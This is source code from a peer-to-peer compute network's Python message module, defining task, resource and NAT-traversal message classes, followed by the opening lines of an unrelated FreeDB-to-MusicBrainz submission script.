def __init__(self, ctd=None, sig="", timestamp=None, dict_repr=None):
"""
Create message with information about subtask to compute
:param ComputeTaskDef ctd: definition of a subtask that should be computed
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageTaskToCompute.Type, sig, timestamp)
self.ctd = ctd
if dict_repr:
self.ctd = dict_repr[MessageTaskToCompute.COMPUTE_TASK_DEF_STR]
def dict_repr(self):
return {MessageTaskToCompute.COMPUTE_TASK_DEF_STR: self.ctd}
def get_short_hash(self):
return SimpleHash.hash(SimpleSerializer.dumps(self._sort_obj(self.ctd)))
class MessageCannotAssignTask(Message):
Type = TASK_MSG_BASE + 3
REASON_STR = u"REASON"
TASK_ID_STR = u"TASK_ID"
def __init__(self, task_id=0, reason="", sig="", timestamp=None, dict_repr=None):
"""
Create message with information that node can't get task to compute
:param task_id: task that cannot be assigned
:param str reason: reason why task cannot be assigned to asking node
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageCannotAssignTask.Type, sig, timestamp)
self.task_id = task_id
self.reason = reason
if dict_repr:
self.task_id = dict_repr[MessageCannotAssignTask.TASK_ID_STR]
self.reason = dict_repr[MessageCannotAssignTask.REASON_STR]
def dict_repr(self):
return {MessageCannotAssignTask.TASK_ID_STR: self.task_id,
MessageCannotAssignTask.REASON_STR: self.reason}
class MessageReportComputedTask(Message):
# FIXME this message should be simpler
Type = TASK_MSG_BASE + 4
SUB_TASK_ID_STR = u"SUB_TASK_ID"
RESULT_TYPE_STR = u"RESULT_TYPE"
COMPUTATION_TIME_STR = u"COMPUTATION_TIME"
NODE_NAME_STR = u"NODE_NAME"
ADDR_STR = u"ADDR"
NODE_INFO_STR = u"NODE_INFO"
PORT_STR = u"PORT"
KEY_ID_STR = u"KEY_ID"
EXTRA_DATA_STR = u"EXTRA_DATA"
ETH_ACCOUNT_STR = u"ETH_ACCOUNT"
def __init__(self, subtask_id=0, result_type=None, computation_time='', node_name='', address='',
port='', key_id='', node_info=None, eth_account='', extra_data=None,
sig="", timestamp=None, dict_repr=None):
"""
Create message with information about finished computation
:param str subtask_id: finished subtask id
:param int result_type: type of a result (from result_types dict)
:param float computation_time: how long does it take to compute this subtask
:param node_name: task result owner name
:param str address: task result owner address
:param int port: task result owner port
:param key_id: task result owner key
:param Node node_info: information about this node
:param str eth_account: ethereum address (bytes20) of task result owner
:param extra_data: additional information, eg. list of files
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageReportComputedTask.Type, sig, timestamp)
self.subtask_id = subtask_id
self.result_type = result_type
self.extra_data = extra_data
self.computation_time = computation_time
self.node_name = node_name
self.address = address
self.port = port
self.key_id = key_id
self.eth_account = eth_account
self.node_info = node_info
if dict_repr:
self.subtask_id = dict_repr[MessageReportComputedTask.SUB_TASK_ID_STR]
self.result_type = dict_repr[MessageReportComputedTask.RESULT_TYPE_STR]
self.computation_time = dict_repr[MessageReportComputedTask.COMPUTATION_TIME_STR]
self.node_name = dict_repr[MessageReportComputedTask.NODE_NAME_STR]
self.address = dict_repr[MessageReportComputedTask.ADDR_STR]
self.port = dict_repr[MessageReportComputedTask.PORT_STR]
self.key_id = dict_repr[MessageReportComputedTask.KEY_ID_STR]
self.eth_account = dict_repr[MessageReportComputedTask.ETH_ACCOUNT_STR]
self.extra_data = dict_repr[MessageReportComputedTask.EXTRA_DATA_STR]
self.node_info = dict_repr[MessageReportComputedTask.NODE_INFO_STR]
def dict_repr(self):
return {MessageReportComputedTask.SUB_TASK_ID_STR: self.subtask_id,
MessageReportComputedTask.RESULT_TYPE_STR: self.result_type,
MessageReportComputedTask.COMPUTATION_TIME_STR: self.computation_time,
MessageReportComputedTask.NODE_NAME_STR: self.node_name,
MessageReportComputedTask.ADDR_STR: self.address,
MessageReportComputedTask.PORT_STR: self.port,
MessageReportComputedTask.KEY_ID_STR: self.key_id,
MessageReportComputedTask.ETH_ACCOUNT_STR: self.eth_account,
MessageReportComputedTask.EXTRA_DATA_STR: self.extra_data,
MessageReportComputedTask.NODE_INFO_STR: self.node_info}
class MessageGetTaskResult(Message):
Type = TASK_MSG_BASE + 5
SUB_TASK_ID_STR = u"SUB_TASK_ID"
DELAY_STR = u"DELAY"
def __init__(self, subtask_id="", delay=0.0, sig="", timestamp=None, dict_repr=None):
"""
Create request for task result
:param str subtask_id: finished subtask id
:param float delay: if delay is 0, than subtask should be send right know. Otherwise other node should wait
<delay> seconds before sending result.
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageGetTaskResult.Type, sig, timestamp)
self.subtask_id = subtask_id
self.delay = delay
if dict_repr:
self.subtask_id = dict_repr[MessageGetTaskResult.SUB_TASK_ID_STR]
self.delay = dict_repr[MessageGetTaskResult.DELAY_STR]
def dict_repr(self):
return {MessageGetTaskResult.SUB_TASK_ID_STR: self.subtask_id,
MessageGetTaskResult.DELAY_STR: self.delay}
# It's an old form of sending task result (don't use if it isn't necessary)
class MessageTaskResult(Message):
Type = TASK_MSG_BASE + 6
SUB_TASK_ID_STR = u"SUB_TASK_ID"
RESULT_STR = u"RESULT"
def __init__(self, subtask_id=0, result=None, sig="", timestamp=None, dict_repr=None):
"""
Create message with task results
:param str subtask_id: id of finished subtask
:param result: task result in binary form
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageTaskResult.Type, sig, timestamp)
self.subtask_id = subtask_id
self.result = result
if dict_repr:
self.subtask_id = dict_repr[MessageTaskResult.SUB_TASK_ID_STR]
self.result = dict_repr[MessageTaskResult.RESULT_STR]
def dict_repr(self):
return {MessageTaskResult.SUB_TASK_ID_STR: self.subtask_id,
MessageTaskResult.RESULT_STR: self.result}
class MessageTaskResultHash(Message):
Type = TASK_MSG_BASE + 7
SUB_TASK_ID_STR = u"SUB_TASK_ID"
MULTIHASH_STR = u"MULTIHASH"
SECRET_STR = u"SECRET"
OPTIONS_STR = u"OPTIONS"
def __init__(self, subtask_id=0, multihash="", secret="", options=None, sig="", timestamp=None, dict_repr=None):
Message.__init__(self, MessageTaskResultHash.Type, sig, timestamp)
self.subtask_id = subtask_id
self.multihash = multihash
self.secret = secret
self.options = options
if dict_repr:
self.subtask_id = dict_repr[MessageTaskResultHash.SUB_TASK_ID_STR]
self.multihash = dict_repr[MessageTaskResultHash.MULTIHASH_STR]
self.secret = dict_repr[MessageTaskResultHash.SECRET_STR]
self.options = dict_repr[MessageTaskResultHash.OPTIONS_STR]
def dict_repr(self):
return {MessageTaskResultHash.SUB_TASK_ID_STR: self.subtask_id,
MessageTaskResultHash.MULTIHASH_STR: self.multihash,
MessageTaskResultHash.SECRET_STR: self.secret,
MessageTaskResultHash.OPTIONS_STR: self.options}
class MessageGetResource(Message):
Type = TASK_MSG_BASE + 8
TASK_ID_STR = u"SUB_TASK_ID"
RESOURCE_HEADER_STR = u"RESOURCE_HEADER"
def __init__(self, task_id="", resource_header=None, sig="", timestamp=None, dict_repr=None):
"""
Send request for resource to given task
:param uuid task_id: given task id
:param ResourceHeader resource_header: description of resources that current node has
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageGetResource.Type, sig, timestamp)
self.task_id = task_id
self.resource_header = resource_header
if dict_repr:
self.task_id = dict_repr[MessageGetResource.TASK_ID_STR]
self.resource_header = dict_repr[MessageGetResource.RESOURCE_HEADER_STR]
def dict_repr(self):
return {MessageGetResource.TASK_ID_STR: self.task_id,
MessageGetResource.RESOURCE_HEADER_STR: self.resource_header
}
# Old method of sending resource. Don't use if it isn't necessary.
class MessageResource(Message):
Type = TASK_MSG_BASE + 9
SUB_TASK_ID_STR = u"SUB_TASK_ID"
RESOURCE_STR = u"RESOURCE"
def __init__(self, subtask_id=0, resource=None, sig="", timestamp=None, dict_repr=None):
"""
Create message with resource
:param str subtask_id: attached resource is needed for this subtask computation
:param resource: resource in binary for
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageResource.Type, sig, timestamp)
self.subtask_id = subtask_id
self.resource = resource
if dict_repr:
self.subtask_id = dict_repr[MessageResource.SUB_TASK_ID_STR]
self.resource = dict_repr[MessageResource.RESOURCE_STR]
def dict_repr(self):
return {MessageResource.SUB_TASK_ID_STR: self.subtask_id,
MessageResource.RESOURCE_STR: self.resource
}
class MessageSubtaskResultAccepted(Message):
Type = TASK_MSG_BASE + 10
SUB_TASK_ID_STR = u"SUB_TASK_ID"
NODE_ID_STR = u"NODE_ID"
REWARD_STR = u"REWARD"
def __init__(self, subtask_id=0, reward=0, sig="", timestamp=None, dict_repr=None):
"""
Create message with information that subtask result was accepted
:param str subtask_id: accepted subtask id
:param float reward: payment for computations
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageSubtaskResultAccepted.Type, sig, timestamp)
self.subtask_id = subtask_id
self.reward = reward
if dict_repr:
self.subtask_id = dict_repr[MessageSubtaskResultAccepted.SUB_TASK_ID_STR]
self.reward = dict_repr[MessageSubtaskResultAccepted.REWARD_STR]
def dict_repr(self):
return {
MessageSubtaskResultAccepted.SUB_TASK_ID_STR: self.subtask_id,
MessageSubtaskResultAccepted.REWARD_STR: self.reward
}
class MessageSubtaskResultRejected(Message):
Type = TASK_MSG_BASE + 11
SUB_TASK_ID_STR = u"SUB_TASK_ID"
def __init__(self, subtask_id=0, sig="", timestamp=None, dict_repr=None):
"""
Create message with information that subtask result was rejected
:param str subtask_id: id of rejected subtask
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageSubtaskResultRejected.Type, sig, timestamp)
self.subtask_id = subtask_id
if dict_repr:
self.subtask_id = dict_repr[MessageSubtaskResultRejected.SUB_TASK_ID_STR]
def dict_repr(self):
return {
MessageSubtaskResultRejected.SUB_TASK_ID_STR: self.subtask_id
}
class MessageDeltaParts(Message):
Type = TASK_MSG_BASE + 12
TASK_ID_STR = u"TASK_ID"
DELTA_HEADER_STR = u"DELTA_HEADER"
PARTS_STR = u"PARTS"
NODE_NAME_STR = u"NODE_NAME"
ADDR_STR = u"ADDR"
PORT_STR = u"PORT"
NODE_INFO_STR = u"node info"
def __init__(self, task_id=0, delta_header=None, parts=None, node_name='',
node_info=None, addr='', port='', sig="", timestamp=None,
dict_repr=None):
"""
Create message with resource description in form of "delta parts".
:param task_id: resources are for task with this id
:param TaskResourceHeader delta_header: resource header containing only parts that computing node doesn't have
:param list parts: list of all files that are needed to create resources
:param str node_name: resource owner name
:param Node node_info: information about resource owner
:param addr: resource owner address
:param port: resource owner port
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageDeltaParts.Type, sig, timestamp)
self.task_id = task_id
self.delta_header = delta_header
self.parts = parts
self.node_name = node_name
self.addr = addr
self.port = port
self.node_info = node_info
if dict_repr:
self.task_id = dict_repr[MessageDeltaParts.TASK_ID_STR]
self.delta_header = dict_repr[MessageDeltaParts.DELTA_HEADER_STR]
self.parts = dict_repr[MessageDeltaParts.PARTS_STR]
self.node_name = dict_repr[MessageDeltaParts.NODE_NAME_STR]
self.addr = dict_repr[MessageDeltaParts.ADDR_STR]
self.port = dict_repr[MessageDeltaParts.PORT_STR]
self.node_info = dict_repr[MessageDeltaParts.NODE_INFO_STR]
def dict_repr(self):
return {
MessageDeltaParts.TASK_ID_STR: self.task_id,
MessageDeltaParts.DELTA_HEADER_STR: self.delta_header,
MessageDeltaParts.PARTS_STR: self.parts,
MessageDeltaParts.NODE_NAME_STR: self.node_name,
MessageDeltaParts.ADDR_STR: self.addr,
MessageDeltaParts.PORT_STR: self.port,
MessageDeltaParts.NODE_INFO_STR: self.node_info
}
class MessageResourceFormat(Message):
Type = TASK_MSG_BASE + 13
USE_DISTRIBUTED_RESOURCE_STR = u"USE_DISTRIBUTED_RESOURCE"
def __init__(self, use_distributed_resource=0, sig="", timestamp=None, dict_repr=None):
"""
Create message with information about resource format
:param bool use_distributed_resource: false if resource will be sent directly, true if resource should be pulled
from network with resource server
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageResourceFormat.Type, sig, timestamp)
self.use_distributed_resource = use_distributed_resource
if dict_repr:
self.use_distributed_resource = dict_repr[MessageResourceFormat.USE_DISTRIBUTED_RESOURCE_STR]
def dict_repr(self):
return {
MessageResourceFormat.USE_DISTRIBUTED_RESOURCE_STR: self.use_distributed_resource
}
class MessageAcceptResourceFormat(Message):
Type = TASK_MSG_BASE + 14
ACCEPT_RESOURCE_FORMAT_STR = u"ACCEPT_RESOURCE_FORMAT"
def __init__(self, sig="", timestamp=None, dict_repr=None):
"""
Create message with resource format confirmation
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageAcceptResourceFormat.Type, sig, timestamp)
if dict_repr:
assert dict_repr.get(MessageAcceptResourceFormat.ACCEPT_RESOURCE_FORMAT_STR)
def dict_repr(self):
return {MessageAcceptResourceFormat.ACCEPT_RESOURCE_FORMAT_STR: True}
class MessageTaskFailure(Message):
Type = TASK_MSG_BASE + 15
SUBTASK_ID_STR = u"SUBTASK_ID"
ERR_STR = u"ERR"
def __init__(self, subtask_id="", err="", sig="", timestamp=None, dict_repr=None):
"""
Create message with information about task computation failure
:param str subtask_id: id of a failed subtask
:param str err: error message that occur during computations
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageTaskFailure.Type, sig, timestamp)
self.subtask_id = subtask_id
self.err = err
if dict_repr:
self.subtask_id = dict_repr[MessageTaskFailure.SUBTASK_ID_STR]
self.err = dict_repr[MessageTaskFailure.ERR_STR]
def dict_repr(self):
return {
MessageTaskFailure.SUBTASK_ID_STR: self.subtask_id,
MessageTaskFailure.ERR_STR: self.err
}
class MessageStartSessionResponse(Message):
Type = TASK_MSG_BASE + 16
CONN_ID_STR = u"CONN_ID"
def __init__(self, conn_id=None, sig="", timestamp=None, dict_repr=None):
"""
Create message with information that this session was started as an answer for a request to start task session
:param uuid conn_id: connection id for reference
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageStartSessionResponse.Type, sig, timestamp)
self.conn_id = conn_id
if dict_repr:
self.conn_id = dict_repr[MessageStartSessionResponse.CONN_ID_STR]
def dict_repr(self):
return {MessageStartSessionResponse.CONN_ID_STR: self.conn_id}
class MessageMiddleman(Message):
Type = TASK_MSG_BASE + 17
ASKING_NODE_STR = u"ASKING_NODE"
DEST_NODE_STR = u"DEST_NODE"
ASK_CONN_ID_STR = u"ASK_CONN_ID"
def __init__(self, asking_node=None, dest_node=None, ask_conn_id=None, sig="", timestamp=None,
dict_repr=None):
"""
Create message that is used to ask node to become middleman in the communication with other node
:param Node asking_node: other node information. Middleman should connect with that node.
:param Node dest_node: information about this node
:param ask_conn_id: connection id that asking node gave for reference
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageMiddleman.Type, sig, timestamp)
self.asking_node = asking_node
self.dest_node = dest_node
self.ask_conn_id = ask_conn_id
if dict_repr:
self.asking_node = dict_repr[MessageMiddleman.ASKING_NODE_STR]
self.dest_node = dict_repr[MessageMiddleman.DEST_NODE_STR]
self.ask_conn_id = dict_repr[MessageMiddleman.ASK_CONN_ID_STR]
def dict_repr(self):
return {
MessageMiddleman.ASKING_NODE_STR: self.asking_node,
MessageMiddleman.DEST_NODE_STR: self.dest_node,
MessageMiddleman.ASK_CONN_ID_STR: self.ask_conn_id
}
class MessageJoinMiddlemanConn(Message):
Type = TASK_MSG_BASE + 18
CONN_ID_STR = u"CONN_ID"
KEY_ID_STR = u"KEY_ID"
DEST_NODE_KEY_ID_STR = u"DEST_NODE_KEY_ID"
def __init__(self, key_id=None, conn_id=None, dest_node_key_id=None, sig="", timestamp=None, dict_repr=None):
"""
Create message that is used to ask node communicate with other through middleman connection (this node
is the middleman and connection with other node is already opened
:param key_id: this node public key
:param conn_id: connection id for reference
:param dest_node_key_id: public key of the other node of the middleman connection
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageJoinMiddlemanConn.Type, sig, timestamp)
self.conn_id = conn_id
self.key_id = key_id
self.dest_node_key_id = dest_node_key_id
if dict_repr:
self.conn_id = dict_repr[MessageJoinMiddlemanConn.CONN_ID_STR]
self.key_id = dict_repr[MessageJoinMiddlemanConn.KEY_ID_STR]
self.dest_node_key_id = dict_repr[MessageJoinMiddlemanConn.DEST_NODE_KEY_ID_STR]
def dict_repr(self):
return {MessageJoinMiddlemanConn.CONN_ID_STR: self.conn_id,
MessageJoinMiddlemanConn.KEY_ID_STR: self.key_id,
MessageJoinMiddlemanConn.DEST_NODE_KEY_ID_STR: self.dest_node_key_id}
class MessageBeingMiddlemanAccepted(Message):
Type = TASK_MSG_BASE + 19
MIDDLEMAN_STR = u"MIDDLEMAN"
def __init__(self, sig="", timestamp=None, dict_repr=None):
"""
Create message with information that node accepted being a middleman
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageBeingMiddlemanAccepted.Type, sig, timestamp)
if dict_repr:
assert dict_repr.get(MessageBeingMiddlemanAccepted.MIDDLEMAN_STR)
def dict_repr(self):
return {MessageBeingMiddlemanAccepted.MIDDLEMAN_STR: True}
class MessageMiddlemanAccepted(Message):
Type = TASK_MSG_BASE + 20
MIDDLEMAN_STR = u"MIDDLEMAN"
def __init__(self, sig="", timestamp=None, dict_repr=None):
"""
Create message with information that this node accepted connection with middleman.
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageMiddlemanAccepted.Type, sig, timestamp)
if dict_repr:
assert dict_repr.get(MessageMiddlemanAccepted.MIDDLEMAN_STR)
def dict_repr(self):
return {MessageMiddlemanAccepted.MIDDLEMAN_STR: True}
class MessageMiddlemanReady(Message):
Type = TASK_MSG_BASE + 21
MIDDLEMAN_STR = u"MIDDLEMAN"
def __init__(self, sig="", timestamp=None, dict_repr=None):
"""
Create message with information that other node connected and middleman session may be started
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageMiddlemanReady.Type, sig, timestamp)
if dict_repr:
assert dict_repr.get(MessageMiddlemanReady.MIDDLEMAN_STR)
def dict_repr(self):
return {MessageMiddlemanReady.MIDDLEMAN_STR: True}
class MessageNatPunch(Message):
Type = TASK_MSG_BASE + 22
ASKING_NODE_STR = u"ASKING_NODE"
DEST_NODE_STR = u"DEST_NODE"
ASK_CONN_ID_STR = u"ASK_CONN_ID"
def __init__(self, asking_node=None, dest_node=None, ask_conn_id=None, sig="", timestamp=None,
dict_repr=None):
"""
Create message that is used to ask node to inform other node about nat hole that this node will prepare
with this connection
:param Node asking_node: node that should be informed about potential hole based on this connection
:param Node dest_node: node that will try to end this connection and open hole in it's NAT
:param uuid ask_conn_id: connection id that asking node gave for reference
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageNatPunch.Type, sig, timestamp)
self.asking_node = asking_node
self.dest_node = dest_node
self.ask_conn_id = ask_conn_id
if dict_repr:
self.asking_node = dict_repr[MessageNatPunch.ASKING_NODE_STR]
self.dest_node = dict_repr[MessageNatPunch.DEST_NODE_STR]
self.ask_conn_id = dict_repr[MessageNatPunch.ASK_CONN_ID_STR]
def dict_repr(self):
return {
MessageNatPunch.ASKING_NODE_STR: self.asking_node,
MessageNatPunch.DEST_NODE_STR: self.dest_node,
MessageNatPunch.ASK_CONN_ID_STR: self.ask_conn_id
}
class MessageWaitForNatTraverse(Message):
Type = TASK_MSG_BASE + 23
PORT_STR = u"PORT"
def __init__(self, port=None, sig="", timestamp=None, dict_repr=None):
"""
Create message that inform node that it should start listening on given port (to open nat hole)
:param int port: this connection goes out from this port, other node should listen on this port
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageWaitForNatTraverse.Type, sig, timestamp)
self.port = port
if dict_repr:
self.port = dict_repr[MessageWaitForNatTraverse.PORT_STR]
def dict_repr(self):
return {MessageWaitForNatTraverse.PORT_STR: self.port}
class MessageNatPunchFailure(Message):
Type = TASK_MSG_BASE + 24
NAT_PUNCH_FAILURE_STR = u"NAT_PUNCH_FAILURE"
def __init__(self, sig="", timestamp=None, dict_repr=None):
"""
Create message that informs node about unsuccessful nat punch
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageNatPunchFailure.Type, sig, timestamp)
if dict_repr:
assert dict_repr.get(MessageNatPunchFailure.NAT_PUNCH_FAILURE_STR)
def dict_repr(self):
return {MessageNatPunchFailure.NAT_PUNCH_FAILURE_STR: True}
class MessageWaitingForResults(Message):
Type = TASK_MSG_BASE + 25
WAITING_FOR_RESULTS_STR = u"WAITING_FOR_RESULTS"
def __init__(self, sig="", timestamp=None, dict_repr=None):
"""
Message informs that the node is waiting for results
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageWaitingForResults.Type, sig, timestamp)
if dict_repr:
assert dict_repr.get(MessageWaitingForResults.WAITING_FOR_RESULTS_STR)
def dict_repr(self):
return {MessageWaitingForResults.WAITING_FOR_RESULTS_STR: True}
class MessageCannotComputeTask(Message):
Type = TASK_MSG_BASE + 26
REASON_STR = u"REASON"
SUBTASK_ID_STR = u"SUBTASK_ID"
def __init__(self, subtask_id=None, reason=None, sig="", timestamp=None, dict_repr=None):
"""
Message informs that the node is waiting for results
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageCannotComputeTask.Type, sig, timestamp)
self.reason = reason
self.subtask_id = subtask_id
if dict_repr:
self.reason = dict_repr[MessageCannotComputeTask.REASON_STR]
self.subtask_id = dict_repr[MessageCannotComputeTask.SUBTASK_ID_STR]
def dict_repr(self):
return {MessageCannotComputeTask.REASON_STR: self.reason,
MessageCannotComputeTask.SUBTASK_ID_STR: self.subtask_id}
RESOURCE_MSG_BASE = 3000
class MessagePushResource(Message):
Type = RESOURCE_MSG_BASE + 1
RESOURCE_STR = u"resource"
COPIES_STR = u"copies"
def __init__(self, resource=None, copies=0, sig="", timestamp=None, dict_repr=None):
"""
Create message with information that expected number of copies of given resource should be pushed to the network
:param str resource: resource name
:param int copies: number of copies
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessagePushResource.Type, sig, timestamp)
self.resource = resource
self.copies = copies
if dict_repr:
self.resource = dict_repr[MessagePushResource.RESOURCE_STR]
self.copies = dict_repr[MessagePushResource.COPIES_STR]
def dict_repr(self):
return {MessagePushResource.RESOURCE_STR: self.resource,
MessagePushResource.COPIES_STR: self.copies
}
class MessageHasResource(Message):
Type = RESOURCE_MSG_BASE + 2
RESOURCE_STR = u"resource"
def __init__(self, resource=None, sig="", timestamp=None, dict_repr=None):
"""
Create message with information about having given resource
:param str resource: resource name
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageHasResource.Type, sig, timestamp)
self.resource = resource
if dict_repr:
self.resource = dict_repr[MessageHasResource.RESOURCE_STR]
def dict_repr(self):
return {MessageHasResource.RESOURCE_STR: self.resource}
class MessageWantResource(Message):
Type = RESOURCE_MSG_BASE + 3
RESOURCE_STR = u"resource"
def __init__(self, resource=None, sig="", timestamp=None, dict_repr=None):
"""
Send information that node want to receive given resource
:param str resource: resource name
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageWantResource.Type, sig, timestamp)
self.resource = resource
if dict_repr:
self.resource = dict_repr[MessageWantResource.RESOURCE_STR]
def dict_repr(self):
return {MessageWantResource.RESOURCE_STR: self.resource}
class MessagePullResource(Message):
Type = RESOURCE_MSG_BASE + 4
RESOURCE_STR = u"resource"
def __init__(self, resource=None, sig="", timestamp=None, dict_repr=None):
"""
Create message with information that given resource is needed
:param str resource: resource name
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessagePullResource.Type, sig, timestamp)
self.resource = resource
if dict_repr:
self.resource = dict_repr[MessagePullResource.RESOURCE_STR]
def dict_repr(self):
return {MessagePullResource.RESOURCE_STR: self.resource}
class MessagePullAnswer(Message):
Type = RESOURCE_MSG_BASE + 5
RESOURCE_STR = u"resource"
HAS_RESOURCE_STR = u"has resource"
def __init__(self, resource=None, has_resource=False, sig="", timestamp=None, dict_repr=None):
"""
Create message with information whether current peer has given resource and may send it
:param str resource: resource name
:param bool has_resource: information if user has resource
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessagePullAnswer.Type, sig, timestamp)
self.resource = resource
self.has_resource = has_resource
if dict_repr:
self.resource = dict_repr[MessagePullAnswer.RESOURCE_STR]
self.has_resource = dict_repr[MessagePullAnswer.HAS_RESOURCE_STR]
def dict_repr(self):
return {MessagePullAnswer.RESOURCE_STR: self.resource,
MessagePullAnswer.HAS_RESOURCE_STR: self.has_resource}
# Old message. Don't use if it isn't necessary.
class MessageSendResource(Message):
Type = RESOURCE_MSG_BASE + 6
RESOURCE_STR = u"resource"
def __init__(self, resource=None, sig="", timestamp=None, dict_repr=None):
"""
Create message with resource request
:param str resource: resource name
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageSendResource.Type, sig, timestamp)
self.resource = resource
if dict_repr:
self.resource = dict_repr[MessageSendResource.RESOURCE_STR]
def dict_repr(self):
return {MessageSendResource.RESOURCE_STR: self.resource}
class MessageResourceList(Message):
Type = RESOURCE_MSG_BASE + 7
RESOURCES_STR = u"resources"
OPTIONS_STR = u"options"
def __init__(self, resources=None, options=None, sig="", timestamp=None, dict_repr=None):
"""
Create message with resource request
:param str resources: resource list
:param str sig: signature
:param float timestamp: current timestamp
:param dict dict_repr: dictionary representation of a message
"""
Message.__init__(self, MessageResourceList.Type, sig, timestamp)
self.resources = resources
self.options = options
if dict_repr:
self.resources = dict_repr[MessageResourceList.RESOURCES_STR]
self.options = dict_repr[MessageResourceList.OPTIONS_STR]
def dict_repr(self):
return {MessageResourceList.RESOURCES_STR: self.resources,
MessageResourceList.OPTIONS_STR: self.options}
def init_messages():
"""Add supported messages to register messages list"""
# Basic messages
MessageHello()
MessageRandVal()
MessageDisconnect()
MessageChallengeSolution()
# P2P messages
MessagePing()
MessagePong()
MessageGetPeers()
MessageGetTasks()
MessagePeers()
MessageTasks()
MessageRemoveTask()
MessageFindNode()
MessageGetResourcePeers()
MessageResourcePeers()
MessageWantToStartTaskSession()
MessageSetTaskSession()
MessageNatHole()
MessageNatTraverseFailure()
MessageInformAboutNatTraverseFailure()
# Ranking messages
MessageDegree()
MessageGossip()
MessageStopGossip()
MessageLocRank()
# Task messages
MessageCannotAssignTask()
MessageCannotComputeTask()
MessageTaskToCompute()
MessageWantToComputeTask()
MessageReportComputedTask()
MessageTaskResult()
MessageTaskResultHash()
MessageTaskFailure()
MessageGetTaskResult()
MessageStartSessionResponse()
MessageMiddleman()
MessageJoinMiddlemanConn()
MessageBeingMiddlemanAccepted()
MessageMiddlemanAccepted()
MessageMiddlemanReady()
MessageNatPunch()
MessageWaitForNatTraverse()
MessageNatPunchFailure()
MessageWaitingForResults()
MessageSubtaskResultAccepted()
MessageSubtaskResultRejected()
MessageDeltaParts()
MessageResourceFormat()
MessageAcceptResourceFormat()
# Resource messages
MessageGetResource()
MessageResource()
MessagePushResource()
MessageHasResource()
MessageWantResource()
MessagePullResource()
MessagePullAnswer()
MessageSendResource()
MessageResourceList()
|
imapp-pl/golem
|
golem/network/transport/message.py
|
Python
|
gpl-3.0
| 70,548
|
#!/usr/bin/env python3
# vim:fileencoding=utf-8
#
# FreeDB2MusicBrainz.py: Submit data from FreeDB to MusicBrainz
# Copyright © 2017 Frederik “Freso” S. Olesen <https://freso.dk/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
""""""
# https://bitbucket.org/metabrainz/musicbrainz-server/pull-requests/1393/mbs-7913-allow-seeding-of-non-url-ars-when/diff
# https://bitbucket.org/metabrainz/musicbrainz-server/pull-requests/770/mbs-7285-cant-seed-external-links-to/diff
# https://github.com/metabrainz/picard-plugins/blob/master/plugins/addrelease/addrelease.py
# https://github.com/JonnyJD/musicbrainz-isrcsubmit
import Cddb
import discid
import musicbrainzngs
__version__ = '0.0.0'
# TODO: Switch to HTTPS (port 443) once upstream is fixed:
# https://github.com/alastair/python-musicbrainzngs/issues/197
MUSICBRAINZ_HOST = 'musicbrainz.org'
def cddb_lookup_string(disc):
"""Generate a `cddb query` compatible string.
Should follow the format of:
